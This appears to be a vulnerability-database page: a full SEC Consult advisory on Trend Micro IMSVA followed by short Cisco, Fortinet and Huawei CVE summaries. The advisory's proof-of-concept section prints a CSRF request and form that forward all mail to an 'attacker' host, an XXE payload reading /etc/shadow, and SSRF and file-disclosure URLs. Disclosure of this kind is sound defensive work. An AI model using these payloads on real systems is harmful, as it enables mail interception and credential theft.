VARIoT IoT vulnerabilities database

VAR-202011-0744 | CVE-2020-27017 | Trend Micro InterScan Messaging Security Virtual Appliance In DTD Vulnerability in improper restriction of recursive entity references in |
CVSS V2: 4.0 CVSS V3: 4.9 Severity: MEDIUM |
Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA) 9.1 is vulnerable to an XML External Entity Processing (XXE) vulnerability which could allow an authenticated administrator to read arbitrary local files. An attacker must already have obtained product administrator/root privileges to exploit this vulnerability. Attackers can use the vulnerability to read arbitrary local files. SEC Consult Vulnerability Lab Security Advisory < 20201104-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Trend Micro InterScan Messaging Security Virtual Appliance (IMSVA)
vulnerable version: < 9.1.0 Critical Patch Build 2025
fixed version: 9.1.0 Critical Patch - Build 2025
CVE number: CVE-2020-27016, CVE-2020-27017, CVE-2020-27018, CVE-2020-27019
CVE-2020-27693, CVE-2020-27694
impact: High
homepage: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
found: 2020-04
by: W. Ettlinger (Office Vienna)
T. Serafin (Office Munich)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Europe | Asia | North America
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"Trend Micro™ InterScan™ Messaging Security provides the most comprehensive
protection against both traditional and targeted attacks. Using the correlated
intelligence from Trend Micro™ Smart Protection Network™ and optional sandbox
execution analysis, it blocks spam, phishing, and advanced persistent threats
(APTs)."
URL: https://www.trendmicro.com/en_us/business/products/user-protection/sps/email-and-collaboration/interscan-messaging.html
Business recommendation:
------------------------
The vendor provides a patch which should be installed immediately.
SEC Consult highly recommends to perform a thorough security review of this
and similar Trend Micro products conducted by security professionals to
identify and resolve potential further security issues.
Vulnerability overview/description:
-----------------------------------
1) Cross-Site Request Forgery (CSRF
CVE-2020-27016 (7.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)
A web service accessible to authenticated administrators allows modifying the
appliance's policy configuration. This web service can also be accessed by
leveraging a CSRF scenario. An attacker could therefore modify policy rules
(e.g. bypass malware checks or forward all mails to another host) by tricking
an authenticated administrator into accessing an attacker-controlled web page.
2) XML External Entity Processing (XXE)
CVE-2020-27017 (7.6 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L)
The web service from vulnerability #1 accepts requests in the form of XML documents.
3) Over-privileged Users/Services
Sudo is configured to allow several system users access to the root account.
An attacker gaining control over one of these accounts can access the system as
root. Moreover, several services are executed with the privileges of the user
root. Therefore, finding #2 allows an attacker to read files only accessible to
root (e.g. /etc/shadow).
4) Server Side Request Forgery (SSRF) & Local File Disclosure
CVE-2020-27018 (2.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N/E:U/RL:X/RC:X)
A script accessible through the appliance's web server can be abused to request
any URL (e.g. http(s), file). An authenticated attacker can e.g. access any
http(s) resources or parts of some local files.
5) Information Disclosure
CVE-2020-27019 (4.8 CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
An SQLite database as well as a cryptographic key located in the webroot can be
accessed without authentication.
Note: It is unclear what the key is used for and whether the SQLite database
could contain sensitive information in specific configurations.
6) Insufficient Password Storage
CVE-2020-27693 (3.1 CVSS:3.0/AV:L/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:L/E:U/RL:X/RC:X)
The appliance stores passwords of administrative users as unsalted MD5 hashes
which can be cracked easily.
7) Outdated Software
CVE-2020-27694 (4.6 CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:L/A:L/E:U/RL:X/RC:X)
Several software components installed on the appliance are outdated. Moreover,
the software updates provided by Trend Micro do not update the packages of the
CentOS base system.
SEC Consult did not verify whether the vulnerabilities identified through the
version information are present or whether the vulnerabilities have an impact
on the security of the system.
Proof of concept:
-----------------
1) Cross-Site Request Forgery (CSRF) (CVE-2020-27016)
The following request will create a rule that forwards all mails to an attacker:
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]
Cookie: JSESSIONID=[...];
Content-Length: 374
<policies>
<policy
name="forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes"
version="1"
order="1"
type="other">
<route direction="incoming">
<from anyone="yes"></from>
<to anyone="yes"></to>
</route>
<actions>
<hand_off>attacker:25</hand_off>
</actions>
</policy>
</policies>
--- snip ---
The following HTML fragment shows how this request can be sent in a CSRF
scenario:
--- snip ---
<form action="https://[...]:8445/ws_policies.imss" method="POST"
enctype="text/plain">
<input type="hidden" name='<policies><policy name'
value='"forward all traffic to attacker"
note="forward all traffic to attacker"
enable="yes" version="1" order="1" type="other">
<route direction="incoming"><from anyone="yes"></from>
<to anyone="yes"></to></route>
<actions><hand_off>attacker:25</hand_off></actions>
</policy></policies>' />
<input type="submit" value="Submit request" />
</form>
--- snip ---
2) XML External Entity Processing (XXE) (CVE-2020-27017)
The following request demonstrates the retrieval of /etc/shadow
--- snip ---
POST /ws_policies.imss HTTP/1.1
Host: [...]:8445
Cookie: JSESSIONID=[...];
Content-Length: 290
<!DOCTYPE foo [<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/shadow" >]>
<policies>
<policy name="test" note="test" enable="yes" version="1" order="2" type="virus">
<route direction="incoming">
<from anyone="no">
<group>&xxe;</group>
</from>
</route>
</policy>
</policies>
--- snip ---
3) Over-privileged Users/Services
The local users "admin", "enable" and all users in the group "cliusers" can execute
commands as root (no password entry required). Note that at least for the users
"admin" and "enable" a restricted shell is configured, thus shell access is not
easily possible.
Several network services (e.g. Tomcat, OpenLDAP, imssmgr) are executed as root.
Trend Micro supplied the following additional information:
(a) If an IMSVA user created clish users, they can only run limited commands
(IMSVA pre-defined commands) and all of these are one time commands
(not a running service in the backend)
(b) Most of these clish commands only read logs, and does not accept any arguments,
so it cannot terminate or inject commands.
(c) Few commands (such as ping) only accept few arguments (such as IP), but these
are well-checked. Users cannot input any arguments with other meaning, so it
cannot terminate or inject commands.
Trend Micro decided not to include vulnerability #3 in the hardening/patch of the
product as admin and enabled accounts are as important as root and changing the
architecture would cause some functions not to work as expected.
4) Server Side Request Forgery (SSRF) & Local File Disclosure (CVE-2020-27018)
The URL demonstrates the retrieval of an HTTP URL through the appliance:
https://<host>:8445/widget/proxy_controller.php?module=modSimple&userGenerated=1&serverid=1&url=http://test
When accessing file:// URLs, the application sends only the content that follows
a sequence \r\n\r\n. Therefore only parts of certain files can be retrieved.
5) Information Disclosure (CVE-2020-27019)
The following URL demonstrates the unauthenticated retrieval of a cryptographic
key:
https://<host>:8445/widget/repository/inc/class/common/crypt/crypt.key
Moreover, an SQLite database can be retrieved.
https://<host>:8445/widget/repository/db/sqlite/tmwf.db
The contents of these files have not been further investigated.
6) Insufficient Password Storage (CVE-2020-27693)
The passwords for local administrators are stored in a Postgres database
(table tb_administrator, column md5_digest). The hashes are stored as unsalted
MD5 digests which can be cracked easily.
7) Outdated Software (CVE-2020-27694)
The following software versions are present in an appliance with patch level
1993:
* PHP 5.6.38 (PHP 5.6 is EOL)
* Apache HTTPD 2.4.37 (see http://httpd.apache.org/security/vulnerabilities_24.html)
* Apache Tomcat 9.0.13 (see http://tomcat.apache.org/security-9.html)
The appliance is built on top of a CentOS base system. The CentOS packages
appear not to be updated with appliance updates. In a test system, the command
"yum check-update" yielded 203 updates to installed packages.
Vulnerable / tested versions:
-----------------------------
Version 9.1.0.1960 Critical Patch 1993 has been tested and was found to be
vulnerable. Previous versions are affected as well.
Vendor contact timeline:
------------------------
2020-04-28: Contacting vendor through security@trendmicro.com
Submitting advisory information encrypted (PGP).
2020-04-28: Vendor reply, they will take a look at the issue.
2020-05-06: Vendor states that vulnerability resolution is in progress;
Vendor has questions regarding two vulnerabilities
2020-05-07: Clarifying vulnerabilities
2020-05-25: Asking for status update
2020-05-25: Vendor: Vulnerability resolution is still in progress,
details follow
2020-05-27: Vendor: A fix for 4 vulnerabilities is expected for the end of June
2020-06-29: Asking for status update
2020-07-01: Vendor provides prerelease update that addresses #1, #2, #4, #5, #6
2020-07-07: Sending results of short recheck
#1 CSRF - fixed
#2 XXE - fixed
#4 SSRF/LFD - fixed
#5 InfoDisc - fixed
#6 Password Storage - not properly fixed yet
2020-07-08: Vendor confirms receipt; has question regarding #3
2020-07-10: Clarifying questions
2020-08-04: Asking for a status update
2020-08-04: Vendor: Issue #3 is under investigation, issue #7 in progress.
2020-08-22: Vendor provides information that all issues have been fixed except
issue #3 as hardening it further would potentially break some features.
2020-08-24: Further advisory release coordination (date, CVE numbers, patch version)
2020-09-18: Asking for a status update; Answer: "The hotfix is ready, however, the
official critical patch to be used for public disclosure is still being
finalized"; disclosure date will be communicated later
2020-10-23: Patch is already public since 2020-10-09, but no security bulletin yet
which will be coordinated
2020-11-04: Coordinated release of security advisory
Solution:
---------
The vendor provides a patch (9.1 Patch 3 - Critical Patch - Build 2025)
which should be installed immediately. The release notes can be found here:
https://files.trendmicro.com/documentation/readme/imsva_91_en_criticalpatch_b2025_EN_Readme.txt
Patch download:
https://downloadcenter.trendmicro.com/index.php?regs=nabu&prodid=91
https://files.trendmicro.com/products/imsva/9.1/imsva_91_en_criticalpatch_b2025.tar.gz
Trend Micro Security Bulletin:
https://success.trendmicro.com/solution/000279833
Workaround:
-----------
No workaround available.
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Europe | Asia | North America
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF W. Ettlinger / @2020
VAR-202011-1023 | CVE-2020-3556 | Cisco AnyConnect Secure Mobility Client Software vulnerabilities |
CVSS V2: 4.4 CVSS V3: 7.3 Severity: HIGH |
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client Software could allow an authenticated, local attacker to cause a targeted AnyConnect user to execute a malicious script. The vulnerability is due to a lack of authentication to the IPC listener. An attacker could exploit this vulnerability by sending crafted IPC messages to the AnyConnect client IPC listener. A successful exploit could allow an attacker to cause the targeted AnyConnect user to execute a script. This script would execute with the privileges of the targeted AnyConnect user. In order to successfully exploit this vulnerability, there must be an ongoing AnyConnect session by the targeted user at the time of the attack. To exploit this vulnerability, the attacker would also need valid user credentials on the system upon which the AnyConnect client is being run. Cisco has not released software updates that address this vulnerability. Cisco AnyConnect Secure Mobility Client There are unspecified vulnerabilities in the software.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco AnyConnect Secure Mobility Client for Linux, etc. are all products of Cisco (Cisco). Cisco AnyConnect Secure Mobility Client for Linux is a Linux-based secure mobile client that provides secure access to networks and applications from any device. Cisco AnyConnect Secure Mobility Client for Android is a secure mobile client based on the Android platform that provides secure access to networks and applications from any device. Cisco AnyConnect Secure Mobility Client for Windows is a Windows-based secure mobile client that provides secure access to networks and applications from any device
VAR-202011-0728 | CVE-2020-27121 | Cisco Unified Communications Manager IM & Presence Service Software vulnerabilities in handling exceptional conditions |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in Cisco Unified Communications Manager IM & Presence Service (Unified CM IM&P) Software could allow an authenticated, remote attacker to cause the Cisco XCP Authentication Service on an affected device to restart, resulting in a denial of service (DoS) condition. The vulnerability is due to improper handling of login requests. An attacker could exploit this vulnerability by sending a crafted client login request to an affected device. A successful exploit could allow the attacker to cause a process to crash, resulting in a DoS condition for new login attempts. Users who are authenticated at the time of the attack would not be affected. There are workarounds that address this vulnerability. This component provides a scalable, distributed and highly available enterprise IP telephony call processing solution
VAR-202011-1024 | CVE-2020-3551 | Cisco Identity Services Engine Cross-site Scripting Vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies
VAR-202011-0729 | CVE-2020-27122 | Cisco Identity Services Engine Vulnerability in privilege management |
CVSS V2: 7.2 CVSS V3: 6.7 Severity: MEDIUM |
A vulnerability in the Microsoft Active Directory integration of Cisco Identity Services Engine (ISE) could allow an authenticated, local attacker to elevate privileges on an affected device. To exploit this vulnerability, an attacker would need to have a valid administrator account on an affected device. The vulnerability is due to incorrect privilege assignment. An attacker could exploit this vulnerability by logging in to the system with a crafted Active Directory account. A successful exploit could allow the attacker to obtain root privileges on an affected device. Cisco Identity Services Engine (ISE) is an identity-based context-aware platform (ISE Identity Services Engine) from Cisco. The platform monitors the network by collecting real-time information on the network, users and devices, and formulating and implementing corresponding policies
VAR-202011-0730 | CVE-2020-27123 | Windows for Cisco AnyConnect Secure Mobility Client Vulnerability in |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
A vulnerability in the interprocess communication (IPC) channel of Cisco AnyConnect Secure Mobility Client for Windows could allow an authenticated, local attacker to read arbitrary files on the underlying operating system of an affected device. The vulnerability is due to an exposed IPC function. An attacker could exploit this vulnerability by sending a crafted IPC message to the AnyConnect process on an affected device. A successful exploit could allow the attacker to read arbitrary files on the underlying operating system of the affected device
VAR-202011-1017 | CVE-2020-3444 | Cisco SD-WAN vEdge input validation error vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the packet filtering features of Cisco SD-WAN Software could allow an unauthenticated, remote attacker to bypass L3 and L4 traffic filters. The vulnerability is due to improper traffic filtering conditions on an affected device. An attacker could exploit this vulnerability by crafting a malicious TCP packet with specific characteristics and sending it to a targeted device. A successful exploit could allow the attacker to bypass the L3 and L4 traffic filters and inject an arbitrary packet into the network. Cisco SD-WAN The software contains an input verification vulnerability.Information may be tampered with. Cisco SD-WAN vEdge is a router from Cisco of the United States. This device can provide basic WAN, security and multi-cloud functions for Cisco SD-WAN solutions
VAR-202011-1022 | CVE-2020-3574 | plural Cisco IP Phone Product vulnerabilities |
CVSS V2: 7.8 CVSS V3: 7.5 Severity: HIGH |
A vulnerability in the TCP packet processing functionality of Cisco IP Phones could allow an unauthenticated, remote attacker to cause the phone to stop responding to incoming calls, drop connected calls, or unexpectedly reload. The vulnerability is due to insufficient TCP ingress packet rate limiting. An attacker could exploit this vulnerability by sending a high and sustained rate of crafted TCP traffic to the targeted device. A successful exploit could allow the attacker to impact operations of the phone or cause the phone to reload, leading to a denial of service (DoS) condition. plural Cisco IP Phone The product contains unspecified vulnerabilities.Denial of service (DoS) It may be put into a state
VAR-202111-0315 | CVE-2020-15935 | FortiADC Vulnerability in plaintext storage of important information in |
CVSS V2: 4.0 CVSS V3: 4.3 Severity: MEDIUM |
A cleartext storage of sensitive information in GUI in FortiADC versions 5.4.3 and below, 6.0.0 and below may allow a remote authenticated attacker to retrieve some sensitive information such as users LDAP passwords and RADIUS shared secret by deobfuscating the passwords entry fields. FortiADC There is a vulnerability in plaintext storage of important information.Information may be obtained. Fortinet FortiADC is an application delivery controller from Fortinet. Affected products and versions are as follows: FortiADC 6.0.0 and earlier, FortiADC 5.4.3 and earlier
VAR-202011-1493 | CVE-2020-15933 | Fortinet FortiMail Vulnerability regarding information leakage in |
CVSS V2: 5.0 CVSS V3: 5.3 Severity: MEDIUM |
A exposure of sensitive information to an unauthorized actor in Fortinet FortiMail versions 6.0.9 and below, FortiMail versions 6.2.4 and below FortiMail versions 6.4.1 and 6.4.0 allows attacker to obtain potentially sensitive software-version information via client-side resources inspection. Fortinet FortiMail There is a vulnerability related to information leakage.Information may be obtained. Fortinet FortiMail is a suite of e-mail security gateway products from Fortinet. The product provides features such as email security and data protection. Affected products and software versions are as follows: FortiMail 6.0.9 and earlier, FortiMail 6.2.4 and earlier, FortiMail 6.4.1 and earlier
VAR-202011-1338 | CVE-2020-3600 | Cisco SD-WAN Software permission management vulnerabilities |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient security controls on the CLI. An attacker could exploit this vulnerability by using an affected CLI utility that is running on an affected system. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN The software contains a vulnerability in privilege management.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco SD-WAN vEdge is a router from Cisco. The appliance provides basic WAN, security and multi-cloud capabilities for Cisco SD-WAN solutions. Attackers can bypass restrictions through Cisco SD-WAN vEdge's CLI utility to elevate their privileges
VAR-202011-1302 | CVE-2020-9128 | FusionCompute Vulnerability in cryptography |
CVSS V2: 2.1 CVSS V3: 4.4 Severity: MEDIUM |
FusionCompute versions 8.0.0 have an insecure encryption algorithm vulnerability. Attackers with high permissions can exploit this vulnerability to cause information leak. FusionCompute Contains a cryptographic vulnerability.Information may be obtained. Huawei FusionCompute is a virtualization support software developed by Huawei in China. The software is a virtualization engine that provides virtualization support for cloud hosts
VAR-202011-1237 | CVE-2020-3591 | Cisco SD-WAN vManage Cross-site scripting vulnerabilities in software |
CVSS V2: 3.5 CVSS V3: 4.3 Severity: MEDIUM |
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco SD-WAN vManage The software contains a cross-site scripting vulnerability.Information may be tampered with. The software is a form of network virtualization
VAR-202011-1236 | CVE-2020-3590 | Cisco SD-WAN vManage Cross-site scripting vulnerabilities in software |
CVSS V2: 3.5 CVSS V3: 6.4 Severity: MEDIUM |
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco SD-WAN vManage The software contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Cisco® SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization
VAR-202011-1028 | CVE-2020-3594 | Cisco SD-WAN Software permission management vulnerabilities |
CVSS V2: 7.2 CVSS V3: 7.8 Severity: HIGH |
A vulnerability in Cisco SD-WAN Software could allow an authenticated, local attacker to elevate privileges to root on the underlying operating system. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by providing crafted options to a specific command. A successful exploit could allow the attacker to gain root privileges. Cisco SD-WAN The software contains a vulnerability in privilege management.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco SD-WAN vEdge is a router from Cisco. The appliance provides basic WAN, security and multi-cloud capabilities for Cisco SD-WAN solutions
VAR-202011-1031 | CVE-2020-3587 | Cisco SD-WAN vManage Cross-site scripting vulnerabilities in software |
CVSS V2: 3.5 CVSS V3: 6.4 Severity: MEDIUM |
A vulnerability in the web-based management interface of the Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco SD-WAN vManage The software contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Cisco® SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization
VAR-202011-1026 | CVE-2020-3592 | Cisco SD-WAN vManage Software fraudulent authentication vulnerabilities |
CVSS V2: 4.0 CVSS V3: 6.5 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an authenticated, remote attacker to bypass authorization and modify the configuration of an affected system. The vulnerability is due to insufficient authorization checking on an affected system. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management interface of an affected system. A successful exploit could allow the attacker to gain privileges beyond what would normally be authorized for their configured user authorization level. This could allow the attacker to modify the configuration of an affected system. Cisco SD-WAN vManage The software contains a vulnerability related to unauthorized authentication.Information may be tampered with. The software is a form of network virtualization
VAR-202011-1025 | CVE-2020-3579 | Cisco SD-WAN vManage Cross-site scripting vulnerabilities in software |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
A vulnerability in the web-based management interface of Cisco SD-WAN vManage Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. Cisco SD-WAN vManage The software contains a cross-site scripting vulnerability.Information may be obtained and information may be tampered with. Cisco® SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization
VAR-202011-1015 | CVE-2020-3371 | Cisco Integrated Management Controller In OS Command injection vulnerability |
CVSS V2: 9.0 CVSS V3: 8.8 Severity: HIGH |
A vulnerability in the web UI of Cisco Integrated Management Controller (IMC) could allow an authenticated, remote attacker to inject arbitrary code and execute arbitrary commands at the underlying operating system level. The vulnerability is due to insufficient input validation. An attacker could exploit this vulnerability by sending crafted commands to the web-based management interface of the affected software. A successful exploit could allow the attacker to inject and execute arbitrary commands at the underlying operating system level. Cisco® Integrated Management Controller (IMC) is an integrated management software used for server management and monitoring by Cisco
VAR-202011-0734 | CVE-2020-27129 | Cisco SD-WAN vManage Software Argument Insertion or Modification Vulnerability |
CVSS V2: 7.2 CVSS V3: 6.7 Severity: MEDIUM |
A vulnerability in the remote management feature of Cisco SD-WAN vManage Software could allow an authenticated, local attacker to inject arbitrary commands and potentially gain elevated privileges. The vulnerability is due to improper validation of commands to the remote management CLI of the affected application. An attacker could exploit this vulnerability by sending malicious requests to the affected application. A successful exploit could allow the attacker to inject arbitrary commands and potentially gain elevated privileges. Cisco SD-WAN vManage The software is vulnerable to inserting or modifying arguments.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state. Cisco® SD-WAN vManage is a software from Cisco that provides software-defined network functions. The software is a form of network virtualization